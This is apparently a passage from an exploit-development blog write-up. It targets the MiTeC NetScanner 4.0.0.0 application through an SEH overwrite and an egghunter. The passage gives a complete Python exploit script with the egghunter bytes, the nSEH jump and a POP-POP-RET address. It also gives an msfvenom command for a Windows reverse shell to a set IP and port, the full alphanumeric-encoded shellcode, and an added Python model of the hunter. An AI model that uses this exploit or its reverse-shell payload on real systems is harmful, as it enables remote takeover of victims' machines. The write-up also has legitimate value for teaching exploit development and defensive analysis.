With 61 bytes available, we have some room to work with. The first thing that
comes to mind is an egghunter, so let's do that.
First we must create the egghunter. This time I will use the egg osce:
$ msf-egghunter -e osce -f python -v EGGHUNTER
EGGHUNTER = b""
EGGHUNTER += b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd"
EGGHUNTER += b"\x2e\x3c\x05\x5a\x74\xef\xb8\x6f\x73\x63\x65"
EGGHUNTER += b"\x89\xd7\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
Update our exploit with that:
#!/usr/bin/env python3
"""
NetScanner 4.0.0.0 exploit.
Vulnerable Software: NetScanner
Vendor: MiTeC
Version: 4.0.0.0
Exploit Author: Andres Roldan
Tested On: Windows Vista Business 32 bits
Writeup: https://fluidattacks.com/blog/netscan-exploit/
"""
EGGHUNTER = b""
EGGHUNTER += b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd"
EGGHUNTER += b"\x2e\x3c\x05\x5a\x74\xef\xb8\x6f\x73\x63\x65"
EGGHUNTER += b"\x89\xd7\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
PAYLOAD = (
# Initial padding
b'A' * 8 +
EGGHUNTER +
b'A' * (76 - 8 - len(EGGHUNTER)) +
# nSEH
b'\xeb\xb4\x41\x41' +
# 00407119 |. 59 POP ECX
# 0040711A |. 5D POP EBP
# 0040711B \. C2 0400 RETN 4
b'\x19\x71\x40'
)
with open('exploit.txt', 'wb') as fd:
fd.write(PAYLOAD)
Great. The egghunter is ready, but there is nothing for it to hunt yet.
We must create a shellcode, place it somewhere in memory and prefix it with
our osceosce egg. But where?
After some analysis of NetScanner, I discovered a feature called
Remote Execute… that takes several parameters. One of them, called
Command line, accepts long alphanumeric strings. In our favor, whatever we
type there stays in memory.
Let's check whether we can use that field to hold our shellcode. Since the
field only takes alphanumeric text, we must first create an alphanumeric
shellcode:
$ msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=192.168.0.18 LPORT=4444 EXITFUNC=none -f raw -e x86/alpha_mixed BufferRegister=EDI
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/alpha_mixed
x86/alpha_mixed succeeded with size 702 (iteration=0)
x86/alpha_mixed chosen with final size 702
Payload size: 702 bytes
WYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIylyxmREPuPc0CPoyYutqkpPdlKrptpnk1B6lLK1BFtNkCBdhVonWaZTfVQkOLlWLcQ1lS2VLUpzajovmwqKwIr8rrr1GnkBrTPLKRjgLLKrlR1ahHcCxS18QsankPY5p5QXSNkpIUHIsGJBiLKFTlKwqiFFQkOLlJaxO4MeQO708ip2UyfVccMxxGKcMUtt5ytqHNkv8a4318SSVnk6lpKlKBxgl7q8SlK4DLK7qJpMYG4UtEtSkskQqv92z0QyoipaOSocjlKVrXknmCmCXUcfRS0EPaxD7PsTrSoaD0hpLRW5vVgYozulxNp5QeP7p6IiTrtbpsXWYmP0k5PkOiEV0BpRpv0g00P3p0PsXZJ6oKoYpkOjuogPjeUe8o0y8eP7b0huRGpga1LMYM60jvprv3gaxLYy5SD1qKOHUk5iPd4TLKOrnFhrUHlBHjPMenBV6kOxUaxsS2McT7poyis0Wsgv7eakFrJWbSiRvyrImU6kwW4fD7LWqc1lMctddvpjfgppDqDpPrvPV1FaV2vRn66aFpSpVaxT9ZlUoMV9oXUlIypPNBvSvIotpqx5XMW5MCPyoYEmklj8E9raMCXlfnummomyoYEelEVQl7zMPykIpRUveoK3wGcT2RO0j30BskOxUAA
Notice that I used the BufferRegister=EDI parameter. The x86/alpha_mixed
decoder needs a register that already points to the start of the encoded
payload, and EDI is the register the egghunter jumps through (jmp edi) once
both scasd checks have matched, so at that moment EDI points to the first
byte after the osceosce egg, i.e. the start of our shellcode.
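To make the hunter's behaviour concrete, here is an added example (not code from the original writeup) that models what the osce egghunter does at runtime and checks the SEH payload layout used above. The flat memory image, the set of "mapped" pages and the SHELLCODE marker are constructed for the example; the real hunter probes each page with a syscall (int 0x2e) instead of consulting a Python set, and the jump math reuses the offsets from the payload (8 bytes of padding, a 32-byte hunter, nSEH at offset 76, jmp short -76).

```python
"""Model of the osce egghunter and a layout check for the SEH payload.

Added example, not code from the original writeup. The memory image, the
set of "mapped" pages and the SHELLCODE marker are constructed here for
illustration; the real hunter probes pages with int 0x2e instead of
consulting a Python set.
"""
import struct

EGG = b"osce"            # egg passed to `msf-egghunter -e osce`
PAGE = 0x1000            # the hunter skips a whole page when a probe faults
PAD = 8                  # 'A' (inc ecx) bytes in front of the hunter
HUNTER_LEN = 32          # size of the msf-egghunter output quoted above
NSEH_OFFSET = 76         # nSEH sits after 76 bytes of buffer
NSEH_JMP = (0xEB, 0xB4)  # `jmp short -76`, the first two nSEH bytes


def hunt(memory, mapped_pages, egg=EGG, start=0):
    """Return the address the hunter leaves in EDI: the first byte after the
    egg repeated twice (scasd, scasd), or None if it is never found.

    Mirrors the hunter's control flow: a faulting page is skipped entirely
    (`or dx, 0x0fff; inc edx`), a mismatch advances one byte (`inc edx`),
    and only the doubled egg counts, so a single 'osce' elsewhere in memory
    (for instance the hunter's own `mov eax, 0x6563736f`) does not stop it.
    """
    doubled = egg * 2
    addr = start
    while addr + len(doubled) <= len(memory):
        if (addr // PAGE) not in mapped_pages:
            addr = (addr | (PAGE - 1)) + 1   # move to the next page boundary
            continue
        if memory[addr:addr + len(doubled)] == doubled:
            return addr + len(doubled)       # what `jmp edi` will execute
        addr += 1
    return None


def constructed_memory():
    """Constructed flat image (not a real process dump): page 0 holds a
    single decoy egg, page 1 is 'unmapped', page 2 holds the doubled egg
    followed by a stand-in for the alpha_mixed blob, the way the Command
    line field would keep it. Returns (image, mapped pages, shellcode addr).
    """
    marker = b"SHELLCODE"
    mem = bytearray(3 * PAGE)
    mem[0x100:0x104] = EGG                   # single egg: must be ignored
    shell_at = 2 * PAGE + 0x20
    egged = EGG * 2 + marker                 # "osceosce" + shellcode
    mem[shell_at - 8:shell_at - 8 + len(egged)] = egged
    return bytes(mem), {0, 2}, shell_at


def short_jmp_target(jmp_offset, rel8):
    """Landing offset of `EB rel8` placed at `jmp_offset`: rel8 is a signed
    displacement relative to the end of the 2-byte instruction."""
    (disp,) = struct.unpack("<b", bytes([rel8]))
    return jmp_offset + 2 + disp


def check_layout(pad=PAD, hunter_len=HUNTER_LEN, nseh=NSEH_OFFSET):
    """Verify the payload layout: the nSEH short jump must land inside the
    inc-ecx sled in front of the hunter, and padding + hunter + filler must
    add up to exactly `nseh` bytes. Returns the computed values."""
    filler = nseh - pad - hunter_len
    landing = short_jmp_target(nseh, NSEH_JMP[1])
    return {
        "filler": filler,
        "landing": landing,
        "lands_in_sled": 0 <= landing < pad,
        "buffer_ok": pad + hunter_len + filler == nseh,
    }


if __name__ == "__main__":
    mem, mapped, expected = constructed_memory()
    found = hunt(mem, mapped)
    print(f"hunter stops at {found:#x} (expected {expected:#x}): "
          f"{mem[found:found + 9]!r}")
    print(check_layout())
```

The two checks are the ones worth doing before firing the exploit: that the only thing the hunter will accept is the doubled egg (a lone "osce", including the one embedded in the hunter's own mov eax, is skipped), and that the jmp short in nSEH lands in the inc ecx sled at offset 2 so execution slides into the hunter at offset 8 instead of into the filler after it.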
Let's update our exploit with the new shellcode:
#!/usr/bin/env python3
"""
NetScanner 4.0.0.0 exploit.
Vulnerable Software: NetScanner
Vendor: MiTeC
Version: 4.0.0.0
Exploit Author: Andres Roldan
Tested On: Windows Vista Business 32 bits
Writeup: https://fluidattacks.com/blog/netscan-exploit/
"""
EGGHUNTER = b""
EGGHUNTER += b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd"
EGGHUNTER += b"\x2e\x3c\x05\x5a\x74\xef\xb8\x6f\x73\x63\x65"
EGGHUNTER += b"\x89\xd7\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
SHELL = (
b'WYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIyl'
b'yxmREPuPc0CPoyYutqkpPdlKrptpnk1B6lLK1BFtNkCBdhVonWaZTf'
b'VQkOLlWLcQ1lS2VLUpzajovmwqKwIr8rrr1GnkBrTPLKRjgLLKrlR1'
b'ahHcCxS18QsankPY5p5QXSNkpIUHIsGJBiLKFTlKwqiFFQkOLlJaxO'
b'4MeQO708ip2UyfVccMxxGKcMUtt5ytqHNkv8a4318SSVnk6lpKlKBx'
b'gl7q8SlK4DLK7qJpMYG4UtEtSkskQqv92z0QyoipaOSocjlKVrXknm'
b'CmCXUcfRS0EPaxD7PsTrSoaD0hpLRW5vVgYozulxNp5QeP7p6IiTrt'
b'bpsXWYmP0k5PkOiEV0BpRpv0g00P3p0PsXZJ6oKoYpkOjuogPjeUe8'
b'o0y8eP7b0huRGpga1LMYM60jvprv3gaxLYy5SD1qKOHUk5iPd4TLKO'
b'rnFhrUHlBHjPMenBV6kOxUaxsS2McT7poyis0Wsgv7eakFrJWbSiRv'
b'yrImU6kwW4fD7LWqc1lMctddvpjfgppDqDpPrvPV1FaV2vRn66aFpS'
b'pVaxT9ZlUoMV9oXUlIypPNBvSvIotpqx5XMW5MCPyoYEmklj8E9raM'
b'CXlfnummomyoYEelEVQl7zMPykIpRUveoK3wGcT2RO0j30BskOxUAA'
)
PAYLOAD = (
# Initial padding
b'A' * 8 +
EGGHUNTER +
b'A' * (76 - 8 - len(EGGHUNTER)) +
# nSEH
b'\xeb\xb4\x41\x41' +
# 00407119 |. 59 POP ECX
# 0040711A |. 5D POP EBP
# 0040711B \. C2 0400 RETN 4
b'\x19\x71\x40'
)
print('[*] Please, paste the following text on:')
print('[*] TOOLS -> Remote Execute... -> Command line')
print('')
print(f'osceosce{SHELL.decode()}')
print('')
print('[*] Now paste the exploit payload.')
with open('exploit.txt', 'wb') as fd:
fd.write(PAYLOAD)
Note that I included some usage instructions in the script. Also, the text to
paste into the Command line field starts with osceosce, the doubled egg that
the hunter searches for (each scasd consumes one copy), followed by the
alphanumeric shellcode. Let's check it.
We were able to overcome all of the original exploit's problems.
You can download the final exploit here.